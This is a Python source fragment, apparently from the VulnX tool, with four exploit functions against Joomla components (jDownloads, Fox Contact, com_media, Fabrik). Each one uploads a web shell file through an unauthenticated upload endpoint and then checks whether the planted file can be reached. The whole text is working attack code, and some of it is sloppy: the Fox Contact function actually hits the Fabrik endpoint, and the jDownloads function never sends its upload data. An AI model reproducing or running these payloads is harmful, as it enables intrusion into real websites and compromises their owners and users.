def joomla_comjdownloads2(url, headers, timeout):
headers[
'User-Agent'] = 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801'
endpoint = url + "/images/jdownloads/screenshots/VulnX.php"
headers = {"content-type": ["form-data"]}
files = open('./shell/VulnX.zip', 'rb')
shell = open('./shell/VulnX.gif', 'rb')
data = {
'name': 'Tig',
'mail': '*****@*****.**',
'filetitle': 'Tig',
'catlist': '1',
'license': '0',
'language': '0',
'system': '0',
'file_upload': files,
'pic_upload': shell,
'description': '<p>zot</p>',
'senden': 'Send file',
'option': 'com_jdownloads',
'view': 'upload',
'send': '1',
'24c22896d6fe6977b731543b3e44c22f': '1'
}
response = vxget(endpoint, headers, timeout)
if re.findall(r'200', response):
print(' %s Com Jdownloads2 %s %s' %
(que, vulnexploit, endpoint))
else:
print(' %s Com Jdownloads2 %s' % (que, failexploit))
def joomla_foxcontact(url, headers, timeout):
headers[
'User-Agent'] = 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801'
# foxf = {'components/com_foxcontact/lib/file-uploader.php?cid={}&mid={}&qqfile=/../../_func.php',
# 'index.php?option=com_foxcontact&view=loader&type=uploader&owner=component&id={}?cid={}&mid={}&qqfile=/../../_func.php',
# 'index.php?option=com_foxcontact&view=loader&type=uploader&owner=module&id={}&cid={}&mid={}&owner=module&id={}&qqfile=/../../_func.php',
# 'components/com_foxcontact/lib/uploader.php?cid={}&mid={}&qqfile=/../../_func.php'}
endpoint = url + "/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload"
headers = {"content-type": ["form-data"]}
fieldname = 'file'
shell = open('./shell/VulnX.txt', 'rb')
data = {
fieldname: shell,
}
content = vxpost(endpoint, data, headers, timeout)
path_shell = endpoint + "/images/XAttacker.txt"
response = vxget(path_shell, headers, timeout)
if re.findall(r'Tig', response):
print(' %s Fox Contact %s %s' %
(que, vulnexploit, path_shell))
else:
print(' %s fox Contact %s' % (que, failexploit))
def joomla_comedia(url, headers, timeout):
headers[
'User-Agent'] = 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801'
endpoint = url + "/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder="
headers = {"content-type": ["form-data"]}
fieldname = 'Filedata[]'
shell = open('./shell/VulnX.txt', 'rb')
data = {
fieldname: shell,
}
content = vxpost(endpoint, data, headers, timeout)
path_shell = endpoint + "/images/XAttacker.txt"
response = vxget(path_shell, headers, timeout)
if re.findall(r'Tig', response):
print(' %s Com Media %s %s' %
(que, vulnexploit, path_shell))
else:
print(' %s Com Media %s' % (que, failexploit))
def joomla_fabrik2_d(url, headers, timeout):
headers[
'User-Agent'] = 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801'
endpoint = url + "/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload"
headers = {"content-type": ["form-data"]}
fieldname = 'file'
shell = open('./shell/VulnX.txt', 'rb')
data = {
fieldname: shell,
}
content = vxpost(endpoint, data, headers, timeout)
path_shell = endpoint + "/images/XAttacker.txt"
response = vxget(path_shell, headers, timeout)
if re.findall(r'Tig', response):
print(' %s Com Fabrik2 %s %s' %
(que, vulnexploit, path_shell))
else:
print(' %s Com Fabrik2 %s' % (que, failexploit))